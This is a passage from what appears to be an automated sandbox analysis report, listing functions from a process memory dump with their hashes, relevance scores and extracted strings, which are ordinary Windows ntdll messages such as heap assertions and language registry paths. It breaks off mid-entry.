                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                      • API String ID: 0-1757540487
                      • Opcode ID: 6926b86c86b67588c578c202c68cd819c1853080fe98d5058a1a97f905eacf44
                      • Instruction ID: 1ca0ffe770921a8ea183744744c34b990a89ae19c6b0f32f754d06765d11b189
                      • Opcode Fuzzy Hash: 6926b86c86b67588c578c202c68cd819c1853080fe98d5058a1a97f905eacf44
                      • Instruction Fuzzy Hash: F251C1726053169BD710EF68C850A7BB3E9AF98714F040A6EF986D7340EB35D904CBA6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0164B8E4, Relevance: 3.8, Strings: 3, Instructions: 69COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                      • API String ID: 0-2558761708
                      • Opcode ID: 5c8df625c62305eaab131ae0e41cbff6e552fd583a1b46c75b5adc4358f1460b
                      • Instruction ID: 1c19a30d87cdb88cf0e422622f0380a4a9138c0db6e9af1084dd03b81237c4fb
                      • Opcode Fuzzy Hash: 5c8df625c62305eaab131ae0e41cbff6e552fd583a1b46c75b5adc4358f1460b
                      • Instruction Fuzzy Hash: 7C11E2353055029FEB2DDB19CC94B36B7AAEF41621F29812DE40BCB381D730D881CB49
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016EE539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: `$`
                      • API String ID: 0-197956300
                      • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                      • Instruction ID: ab0ec8ac83e067ef5419767d180b486fc131d4215f4ae32044b96e766b239ba6
                      • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                      • Instruction Fuzzy Hash: DF9192312053429FEB24CF69CC49B27BBE6AF84714F148A2DF695CB290E776E904CB51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016A51BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID: InitializeThunk
                      • String ID: Legacy$UEFI
                      • API String ID: 2994545307-634100481
                      • Opcode ID: 39fc742b8cfa7d8ca342d030cd5787d090356ba5db6685da7b16ead7f8a85346
                      • Instruction ID: 35405bca14efc40fca0285ba933405ccaf63f407cfbe37c2476a9a178db48fb3
                      • Opcode Fuzzy Hash: 39fc742b8cfa7d8ca342d030cd5787d090356ba5db6685da7b16ead7f8a85346
                      • Instruction Fuzzy Hash: F0516D71A006099FDB25DFA8CC40AAEBBF9BF88700F54406DE60AEB251E7719D01CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0162B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID: _vswprintf_s
                      • String ID:
                      • API String ID: 677850445-0
                      • Opcode ID: a83c2ff30b5d141fc5b6349bc8294aae6a40a976bf7cbb982bdac26927e09299
                      • Instruction ID: 8f74e3fa7af2f58e988d35bf9dcbcaa4d2c2fd370ead91ea9d8f653130d9295d
                      • Opcode Fuzzy Hash: a83c2ff30b5d141fc5b6349bc8294aae6a40a976bf7cbb982bdac26927e09299
                      • Instruction Fuzzy Hash: 7F51B371D1025A8ADF31EF68CC44BAEBBB1AF04710F1142ADD859AB382DB718945CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0164B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                      Download Yara Rule
                      APIs
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0164B9A5
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID:
                      • API String ID: 885266447-0
                      • Opcode ID: f0c4c707dae90d387b0e92b134bd83a732f42ee7480609525f461d05ca6431f6
                      • Instruction ID: 5b457fb3411fa6874a1398c9b420879bef3c9887100fa8fde3fa73108218fd0a
                      • Opcode Fuzzy Hash: f0c4c707dae90d387b0e92b134bd83a732f42ee7480609525f461d05ca6431f6
                      • Instruction Fuzzy Hash: 83515B71A08341CFC720CF6DC88092ABBFAFB88650F14896EFA9597355D771E844CB92
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01652581, Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: PATH
                      • API String ID: 0-1036084923
                      • Opcode ID: 0d6c06bb376d882a6e0c1084f0995554ac257d80c4fa305479100c461469e921
                      • Instruction ID: dbf957dfdca679d70d0a6deac8c28a015ac42d0d8023ba950da50cf84d3bcaf5
                      • Opcode Fuzzy Hash: 0d6c06bb376d882a6e0c1084f0995554ac257d80c4fa305479100c461469e921
                      • Instruction Fuzzy Hash: CCC15AB1E00219DBDB65DF99DCA1ABEBBB5FF58710F04402DE901AB350DB34A942CB64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0165FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                      Download Yara Rule
                      Strings
                      • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0169BE0F
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                      • API String ID: 0-865735534
                      • Opcode ID: 64732b5f389aba358531cf5125e85502d3179a33c80a88a1d06efc26124f88bd
                      • Instruction ID: be721b9357b276afb43cbbaf3af4aefcd44d32d31b1f22ba88705462851701b7
                      • Opcode Fuzzy Hash: 64732b5f389aba358531cf5125e85502d3179a33c80a88a1d06efc26124f88bd
                      • Instruction Fuzzy Hash: B1A1D372B00606CBEB65DB6CCC50B7AB7AAAF44720F0445BDED46DB791DB34D8428B90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01622D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: RTL: Re-Waiting
                      • API String ID: 0-316354757
                      • Opcode ID: f6c31af095f280c9ffb20cdce670076f30d0bf30b61617846559eef37041df4d
                      • Instruction ID: 68cbf1464b92325758f6f69cec5b908bc7b86323e456486a8149e8617371c872
                      • Opcode Fuzzy Hash: f6c31af095f280c9ffb20cdce670076f30d0bf30b61617846559eef37041df4d
                      • Instruction Fuzzy Hash: 62612331A00A15DFEB32EB6CCC90B7EBBA6EB40724F1406ADE961973C1C7349941CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016F0EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: `
                      • API String ID: 0-2679148245
                      • Opcode ID: f4d7f175287be0bb066c2340010f7fdb012ab99dab798cdb7251eea1ac990e0c
                      • Instruction ID: 829cfeedf9c29a5831d429f0bc2e8dedaf21c81c6750806468f8d247a39fa4f1
                      • Opcode Fuzzy Hash: f4d7f175287be0bb066c2340010f7fdb012ab99dab798cdb7251eea1ac990e0c
                      • Instruction Fuzzy Hash: 08519D713043829FD324DF28DD84B1BBBE6EB85754F040A6CFA9697291DB70E805CB62
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0165F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: @
                      • API String ID: 0-2766056989
                      • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                      • Instruction ID: e08b409f409e7132bbdf080632c2292c18c6b2e95213126d04cc9f0440189dbe
                      • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                      • Instruction Fuzzy Hash: 66517A71504711AFC320DF69C840A6BBBF9FF48750F00892EFA9597690E7B4E904CBA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016A3540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: BinaryHash
                      • API String ID: 0-2202222882
                      • Opcode ID: c846e8069ebf9da890be95773df122c91691fa26a0bcec34dd6be6971c48b235
                      • Instruction ID: 2f63872e68631eb02eb3ab39ce6539a402fca154bbf0f9d172c23d483a71750c
                      • Opcode Fuzzy Hash: c846e8069ebf9da890be95773df122c91691fa26a0bcec34dd6be6971c48b235
                      • Instruction Fuzzy Hash: 614134B2D0052D9BDB21DA54CC85FEEB77DAB54714F4045E9EA09AB240DB309E88CF98
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016F05AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: `
                      • API String ID: 0-2679148245
                      • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                      • Instruction ID: 245c6719428f28e56a69c1e42f8b9b6f100ffd6d3c6d2fcc6ec222b0f5e0ef1f
                      • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                      • Instruction Fuzzy Hash: 4D31F132300356ABE720DE28CC84F9B7BDAEB84754F14422DFB589B281D770E904CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016A3884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: BinaryName
                      • API String ID: 0-215506332
                      • Opcode ID: 7ac3edfb7611abc995b1b57093c6ef743e4675721f149c2e6ea820f5d7b2da92
                      • Instruction ID: 106b92232dbf05dd02ad048398bd4c778d4177bc123a79df8a72b06f98114b20
                      • Opcode Fuzzy Hash: 7ac3edfb7611abc995b1b57093c6ef743e4675721f149c2e6ea820f5d7b2da92
                      • Instruction Fuzzy Hash: E531E33290061AAFEB16DA58CD45E7BFB79FF80B20F414169E914A7391E7309E04CBE0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0165D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: @
                      • API String ID: 0-2766056989
                      • Opcode ID: 850afac078ee3a6f97c9d69812550600d45123ce0464df06da0b64440f64b971
                      • Instruction ID: 2f1c9c3bf9e0ea4ce3d90b3e62c22aba1c83726b40a4b26e20abaa599a5c9190
                      • Opcode Fuzzy Hash: 850afac078ee3a6f97c9d69812550600d45123ce0464df06da0b64440f64b971
                      • Instruction Fuzzy Hash: 5F319EB1509305DFC761DF68CC8096BBBE9EB96654F00092EF99483291D735DD05CB92
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01631B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: WindowsExcludedProcs
                      • API String ID: 0-3583428290
                      • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                      • Instruction ID: fd7e4f718cf20861ba4d24018dceda117bef44e183eb2ea903049b4a0f00732d
                      • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                      • Instruction Fuzzy Hash: 9C210A7A500129ABDB22AA59CC40F5B7BADEF82650F154525FE149B300DB38DC02D7B0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0164F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: Actx
                      • API String ID: 0-89312691
                      • Opcode ID: bab9ce06ef083de20ac0758a40abd9d22f8255bf078593306cb71230a98e121b
                      • Instruction ID: 190b1df04301c10f37ba06850f02e9742c7c329a9ba5b3831fd8b246fb41ad67
                      • Opcode Fuzzy Hash: bab9ce06ef083de20ac0758a40abd9d22f8255bf078593306cb71230a98e121b
                      • Instruction Fuzzy Hash: 281104347487028BFB25CE1CAD9073676D9EB85224F2445BAE462CB791DB7CC8028740
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016D8DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                      Download Yara Rule
                      Strings
                      • Critical error detected %lx, xrefs: 016D8E21
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: Critical error detected %lx
                      • API String ID: 0-802127002
                      • Opcode ID: 06297f17eab8fb4b2e20805e4b51dcbc18297873025d27626a1969703cefe2e6
                      • Instruction ID: 49c0f31ad219901217edc380b24e1197ba61b7fd8974d2996b7a42dff53cdf64
                      • Opcode Fuzzy Hash: 06297f17eab8fb4b2e20805e4b51dcbc18297873025d27626a1969703cefe2e6
                      • Instruction Fuzzy Hash: 111157B1D14348DADF26DFA899097DDBBB5BF18315F24466EE529AB382C3344602CF18
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016BFF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                      Download Yara Rule
                      Strings
                      • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 016BFF60
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                      • API String ID: 0-1911121157
                      • Opcode ID: fa602748c219903b96acfdcd814288341d28a17e3a6cbf4f5266f47a0ed2627f
                      • Instruction ID: 5bebac89330d510be6c2a42414c5d46adbf8e219a0c6d5b28c971471fdbff483
                      • Opcode Fuzzy Hash: fa602748c219903b96acfdcd814288341d28a17e3a6cbf4f5266f47a0ed2627f
                      • Instruction Fuzzy Hash: 2911C071910244EFDF26EF98CD89FD8BBB2FF09715F148498E5096B2A1C7399980DB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016F5BA5, Relevance: .6, Instructions: 592COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1ae6dfbf014f66fb8614edc15360fd5777dfe8f504042597d0813a5fb51eacaa
                      • Instruction ID: 6580b97a50c3ced4978322007b87620b9cb4deddf92c832d8b3ddf744d38607d
                      • Opcode Fuzzy Hash: 1ae6dfbf014f66fb8614edc15360fd5777dfe8f504042597d0813a5fb51eacaa
                      • Instruction Fuzzy Hash: FA4237759002298FDB24CF68CC80BA9BBB1FF49304F1581AEDA4DAB342D7759A85CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01644120, Relevance: .4, Instructions: 444COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dd1195d881ceccfe6c2515aa8f17b3b759581917388a3b8a44e62192f9eec64b
                      • Instruction ID: 5f90dc378780ce26ca876332af912a2b20dc6ba2bb9cde9b5169c1eb9d742bfa
                      • Opcode Fuzzy Hash: dd1195d881ceccfe6c2515aa8f17b3b759581917388a3b8a44e62192f9eec64b
                      • Instruction Fuzzy Hash: F6F17C706082118BD724DF19C891B7AB7E1FF99714F04892EF986CB750EB35D881CB52
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016520A0, Relevance: .4, Instructions: 420COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3cd4a08fadf0ef197ed62e6566153dc7af771d09e25ec833b198242e4988c199
                      • Instruction ID: fe53b5f4ff7270c1b711d1a3f2c75ede668cd0dafacbbbe14b9b28f3efacdbca
                      • Opcode Fuzzy Hash: 3cd4a08fadf0ef197ed62e6566153dc7af771d09e25ec833b198242e4988c199
                      • Instruction Fuzzy Hash: 24F1D135608341DFEB66CB2CCC5076B7BE6AB85364F04891EEE969B381D734D841CB92
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0163D5E0, Relevance: .4, Instructions: 353COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a9e4bc780eb4c73ff03b1cd94135fd9ca92ecb00e6460c6b3b9ed7fff2361d41
                      • Instruction ID: 63b70bddec4a4154a76a6f74f017297fbc52b43f5c977f6fb544f91ef3b508b0
                      • Opcode Fuzzy Hash: a9e4bc780eb4c73ff03b1cd94135fd9ca92ecb00e6460c6b3b9ed7fff2361d41
                      • Instruction Fuzzy Hash: D0E1CE70A0125A8FEB35DF6CCC90BB9BBB2BF86314F4542ADD90997391D730A981CB51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0163849B, Relevance: .3, Instructions: 290COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5744675362da91c9734312dce856c424de496282beb9180d3e50edec905f097e
                      • Instruction ID: 881dfcfcd1ab021e7dcb6bbea2fe75ac2ee13d719d91e0f2e3cf4a413598ece7
                      • Opcode Fuzzy Hash: 5744675362da91c9734312dce856c424de496282beb9180d3e50edec905f097e
                      • Instruction Fuzzy Hash: 9BB13C70E00219DFDB25DFA9CD84AEEBBBABF85304F10422DE505AB345D774A945CB50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0165513A, Relevance: .3, Instructions: 258COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 057adf4452c98c57417b0e2225367bcd35d053d379178a882dc84130a90e0c1a
                      • Instruction ID: ec69cb211479a199d8f05a1cd857bcf5bcc93c6cd884b3b7ea9c23aefe07e3fe
                      • Opcode Fuzzy Hash: 057adf4452c98c57417b0e2225367bcd35d053d379178a882dc84130a90e0c1a
                      • Instruction Fuzzy Hash: 54C113755083818FD755CF28C980A5AFBF1BF88304F148A6EF99A8B362D771E945CB42
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016503E2, Relevance: .3, Instructions: 254COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 38cc3e8da8a100694d577ee98a1dd68d9caa1d6d3be0c7cbcd01c2eb264795d3
                      • Instruction ID: a248b0550df47f67fdf1be500bc9e62cce20075a9eebb5429fec8f84360c4775
                      • Opcode Fuzzy Hash: 38cc3e8da8a100694d577ee98a1dd68d9caa1d6d3be0c7cbcd01c2eb264795d3
                      • Instruction Fuzzy Hash: BD910132E00615EFEF329A6CCE44BAD7BA9AB05724F050265FE10AB2D1DB74DD02C785
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0162C600, Relevance: .2, Instructions: 225COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8d6957365b1633d69853dcbb277fe582d94fb654e22ca3e0fd43f516f5018125
                      • Instruction ID: aea53e7b683cbcfab525b1baa9e05b9e30bbd0a111c8c10ad0b602dc80fa92f4
                      • Opcode Fuzzy Hash: 8d6957365b1633d69853dcbb277fe582d94fb654e22ca3e0fd43f516f5018125
                      • Instruction Fuzzy Hash: 88819D756242068BDF26CE58CC80A7AB7ADFF84250F14496EEE459B345D334ED41CFA2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016BB8D0, Relevance: .2, Instructions: 199COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cd04bbafea35fa62260ec776fd53676790801300a12737a460bf27a65606392b
                      • Instruction ID: 3aafd0da5c6b6e0fa222a3a056c99d5644905ae77a8a74faf356e9be1d42dd65
                      • Opcode Fuzzy Hash: cd04bbafea35fa62260ec776fd53676790801300a12737a460bf27a65606392b
                      • Instruction Fuzzy Hash: B671F132640702EFE732DF18CC85FA6BBA6EB40720F15492CEA55876A1DB71E981CB50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016A6DC9, Relevance: .2, Instructions: 199COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                      • Instruction ID: dad0ceefa39edb3dc9c80d6680bef4058b6f058031d30dc8fe5e1a48246f5ad4
                      • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                      • Instruction Fuzzy Hash: 22716B71A0021AEFDB10DFA8CD84AEEBBBAFF48714F544469E505A7250DB30AE41CF94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016252A5, Relevance: .2, Instructions: 161COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e7f38c8f7d36d7cb22b355100015cbe40466839aaff9f7bac6cf86287cc93f3f
                      • Instruction ID: e36d54688c181f9f1e18dee60b7bc0d73b30e3f7115aa885691f0278cb03a2c3
                      • Opcode Fuzzy Hash: e7f38c8f7d36d7cb22b355100015cbe40466839aaff9f7bac6cf86287cc93f3f
                      • Instruction Fuzzy Hash: D451BE712057429BD322EF28CC40B67BBE6FF94710F14491EF99687691E774E808CBA6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01652AE4, Relevance: .2, Instructions: 159COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0954312c4f1f242390bced5f6be5ffb343dd22b2227c5e6f079e546723bf84c0
                      • Instruction ID: fad5b7abdc27927bb0f2301bb1f6ae3fb05c4adc3e7353758e27c321e1dd2b2d
                      • Opcode Fuzzy Hash: 0954312c4f1f242390bced5f6be5ffb343dd22b2227c5e6f079e546723bf84c0
                      • Instruction Fuzzy Hash: B551AF76A00125CFCB59CF1CCCA09BDB7B1FB88704B19855EEC56AB315D734AA91CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016EAE44, Relevance: .2, Instructions: 152COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f5e896cdb3e51bdf1e16720b36a1fd3954c1d7fdf208df86d8ee007553c1a5d8
                      • Instruction ID: c9dbbd4de32afd05969f4065e28b445ace661928987d36f83060ee1cb8ec7652
                      • Opcode Fuzzy Hash: f5e896cdb3e51bdf1e16720b36a1fd3954c1d7fdf208df86d8ee007553c1a5d8
                      • Instruction Fuzzy Hash: 8A41B0B17026119BE7269BADCC9CB3BBBDAAF94620F04831DF956873D0DB34D801D691
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0164DBE9, Relevance: .1, Instructions: 149COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ce8cc469085d60bc50df5448c6082cd2966de33ebf6e26ebbb912e528492b949
                      • Instruction ID: cd0405acb86cee3dabeabc049f1d910b483496208a581f608b04ae56210022fe
                      • Opcode Fuzzy Hash: ce8cc469085d60bc50df5448c6082cd2966de33ebf6e26ebbb912e528492b949
                      • Instruction Fuzzy Hash: 2B51DE72E00216CFCB15CFACC890AAEBBF6FF59310F20815AD995A7304DB30A940CB94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0163EF40, Relevance: .1, Instructions: 147COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                      • Instruction ID: a095f44a84e991dfd6da76de6ec92936d50093c39987e71aca6e6577a63db549
                      • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                      • Instruction Fuzzy Hash: D8510430E04649DFEB25CB6CC9A07AEFBB1AF85314F1881ACD54553382C7B6A989C752
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016F740D, Relevance: .1, Instructions: 141COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                      • Instruction ID: 93663e2e4eb91d92cc9469e79171e0c229a1af65c4aea9d07e1b9f5c4ca718e1
                      • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                      • Instruction Fuzzy Hash: 58519071600646EFDB16CF58D884A96BBB5FF45304F14C0AEEA08DF252EB71E946CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01652990, Relevance: .1, Instructions: 133COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1e88fd6d18ed8f21eaef6f8fb28e8a7812cef5730bf0e524de18c6d770e098a7
